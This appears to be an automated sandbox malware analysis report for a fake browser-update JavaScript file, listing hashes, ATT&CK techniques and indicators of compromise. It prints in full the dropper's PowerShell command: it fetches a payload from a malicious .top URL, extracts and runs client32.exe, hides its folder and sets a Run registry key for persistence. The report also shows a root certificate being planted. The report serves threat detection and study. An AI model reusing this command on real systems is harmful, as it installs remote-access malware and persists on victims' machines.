89dab4aad85879ed827c8d60f1d422df4ed82898fd61405da669022f49410412

General

Target

Update_123.0.6312.111.js
Size

22.4MB
MD5

c0e810d8e3142bfc0c5cd606e1316f5f
SHA1

61f4b334b4a2a723469a65a3c16361f578b7ef2d
SHA256

c44c75c3724806765edb1de79f9c459980537761769d54dc173540cf7d0775f5
SHA512

3f527308119d90e39ec431366020842873d3d1da3886aadca04d8e8f1509324742766d6b0663af1e2f42f5416d4c2015a89afde18248e6e746e6bcd700267a87
SSDEEP

49152:I7VIzjCxbeqHlp4WhwN0b/hJ9EiItYzYqmZV+86OL3t0/r39GoD53quUQKugpcEa:W

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pdd888167.top/data.php?7057

exe.dropper

https://pdd888167.top/data.php?7057

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
4	1540	wscript.exe
7	1540	wscript.exe
9	1540	wscript.exe
11	1652	powershell.exe
12	1652	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1652	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	wscript.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1652	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1652	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1540 wrote to memory of 1652	1540	wscript.exe	30
PID 1540 wrote to memory of 1652	1540	wscript.exe	30
PID 1540 wrote to memory of 1652	1540	wscript.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_123.0.6312.111.js
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $qMSSBTXhvfmaJWXnVHAMIw='https://pdd888167.top/data.php?7057';$jBkPsCycfpeERMLByHQYDlmTNfYPBOeKc=(New-Object System.Net.WebClient).DownloadString($qMSSBTXhvfmaJWXnVHAMIw);$YhNRjithmKiQRFDLUauFGKgNjUGQo=[System.Convert]::FromBase64String($jBkPsCycfpeERMLByHQYDlmTNfYPBOeKc);$zxc = Get-Random -Minimum -10 -Maximum 37; $iOmEHKWGIbblnRJDLgltThqvLJHS=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $iOmEHKWGIbblnRJDLgltThqvLJHS -PathType Container)) { New-Item -Path $iOmEHKWGIbblnRJDLgltThqvLJHS -ItemType Directory };$p=Join-Path $iOmEHKWGIbblnRJDLgltThqvLJHS 'ah.zip';[System.IO.File]::WriteAllBytes($p,$YhNRjithmKiQRFDLUauFGKgNjUGQo);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$iOmEHKWGIbblnRJDLgltThqvLJHS)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $iOmEHKWGIbblnRJDLgltThqvLJHS 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $iOmEHKWGIbblnRJDLgltThqvLJHS -Force; $AZ.attributes='Hidden';$s=$iOmEHKWGIbblnRJDLgltThqvLJHS+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1652-20-0x000007FEF5E1E000-0x000007FEF5E1F000-memory.dmp

Filesize
4KB

Download
memory/1652-21-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/1652-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1652-23-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/1652-24-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/1652-25-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/1652-26-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/1652-27-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing